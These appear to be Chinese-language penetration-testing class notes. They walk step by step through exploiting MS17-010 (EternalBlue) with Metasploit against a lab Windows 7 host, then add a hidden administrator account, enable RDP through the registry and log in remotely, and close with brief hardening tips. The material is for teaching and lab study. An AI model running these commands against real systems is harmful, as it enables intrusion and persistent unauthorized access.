《網絡安全與滲透測試》課堂筆記---05

2019/4/18- - -
關於kali linux利用MS17-010“永恆之藍”的滲透攻擊windows7,實現遠程登錄的效果。
以及如何防護等內容。
此文章是用於課堂實驗，切勿違法犯罪
1、“永恆之藍”的介紹

“永恆之藍”利用Windows系統的SMB漏洞可以獲取系統最高權限。
惡意代碼會掃描開放445文件共享端口的Windows機器，無需用戶任何操作，
只要開機上網，不法分子就能在電腦和服務器中植入勒索軟件、遠程控制木馬、虛擬貨幣挖礦機等惡意程序。

2、實驗環境的準備
（1）Windows7開啓445端口，默認開啓
開啓445端口可以在局域網中輕鬆訪問各種共享文件夾或共享打印機

（2）kali linux 與 windows7能互相ping通，Windows7防火牆關閉

3、實施滲透攻擊
在kali linux 中輸入msfconsole命令，調用Metasploit工具

msfconsole

然後搜索一下ms17-010這個漏洞

search ms17-010

使用ms17-010的掃描漏洞模塊

use auxiliary/scanner/smb/smb_ms17_010 

然後查看一下選項

show options

再設置一下目標地址

set rhosts 192.168.247.20

再查看一下，發現已經將目標地址（Windows7的ip地址）設置進去了

show options

現在我們發動漏洞掃描這個模塊

run

發現是主機可能易受MS17-010攻擊,還顯示出了Windows7的版本信息

192.168.247.20:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)

再接着，輸入back,回到剛剛打開msfconsole的狀態

back

搜索一下ms17-010這個漏洞

search ms17-010

使用"永恆之藍"這個漏洞攻擊模塊

use exploit/windows/smb/ms17_010_eternalblue

然後再查看一下

show options

再設置一下目標地址

set rhosts 192.168.247.20

再查看一下，發現已經將目標地址（Windows7的ip地址）設置進去了

show options

現在我們發動漏洞攻擊這個模塊

exploit

顯示出下列這個信息後，enter（回車一下）
[+] 192.168.247.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.247.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.247.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

就進入了Windows7的shell界面
輸入一下whoami，查看一下是誰在登錄
會發現我們是系統的最高權限賬戶在登錄。攻擊完成。

4、kali Linux遠程連接win7的攻擊
先來查看一下Windows7的遠程連接，是沒有開啓的。

我們可以使用kali linux利用MS17-010實現打開遠程連接，並自己創建用戶，來遠程連接。
首先，我們已經攻擊成功，並進入了Windows7的shell界面，然後做以下事情：
開始之前先解決一個亂碼問題

（1）添加一個名字爲snp的用戶，密碼snp

 net user snp snp /add

（2）提升爲管理員權限

net localgroup administrators snp /add
net localgroup administrators #註釋：查看一下管理員組有沒有自己剛剛添加的用戶

（3）利用註冊表，打開遠程連接

 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTsConnections /t REG_DWORD /d 00000000 /f

（4）在kali Linux中使用剛剛添加的用戶遠程連接Windows7
輸入

rdesktop 192.168.247.20:3389

然後用剛剛添加的用戶賬號登錄
點擊是

看到下面這個情況，等待一會兒。

然後就遠程連接上了

安全問題：如何防護？
1、既想使用遠程連接的功能，又怕被攻擊，那就更改一下遠程連接的端口號
Windows7註冊表修改遠程連接端口號
（1）打開註冊表
Windows + r 輸入 regedit

（2）找到此路徑（1），將3389修改爲4000

（2）找到此路徑（2），將3389修改爲4000，然後重啓計算機。

2、提示需要更新系統時，及時更新，避免不法之人利用漏洞，做違法事情，我們而因此受到攻擊
3、打開防火牆，關閉不常用的端口。
☺ok,有什麼問題，歡迎評論交流(*￣︶￣)